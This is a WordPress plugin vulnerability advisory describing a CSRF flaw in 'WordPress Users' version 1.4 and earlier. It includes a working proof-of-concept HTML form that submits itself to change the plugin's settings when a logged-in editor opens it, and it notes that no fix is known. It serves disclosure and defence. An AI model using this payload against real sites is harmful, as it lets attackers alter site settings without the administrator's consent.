WordPress Plugin Vulnerabilities

WordPress Users <= 1.4 - Settings Update via CSRF

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.

Proof of Concept

Create an HTML with the following and open it when logged in as an Editor or above:

<form action="https://example.com/wp-admin/options-general.php?page=wordpress-users/wp-users.php" method="POST">
    <input type="text" name="wpu_hidden" value="Y">
    <input type="text" name="wpu_page_id" value="1">
    <input type="text" name="wpu_users_per" value="10">
    <input type="text" name="wpu_roles_admin" value="yes">
    <input type="text" name="wpu_description_limit" value="">
    <input type="text" name="wpu_avatars" value="gravatars">
    <input type="text" name="wpu_gravatar_type" value="">
    <input type="text" name="wpu_gravatar_size" value="">
    <input type="text" name="Submit" value="Update Options">
</form>
<script>
    document.forms[0].submit();
</script>

Affects Plugins

No known fix

References

Classification

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes

Timeline

Publicly Published
2024-01-03 (about 4 months ago)
Added
2024-01-03 (about 4 months ago)
Last Updated
2024-01-03 (about 4 months ago)

Other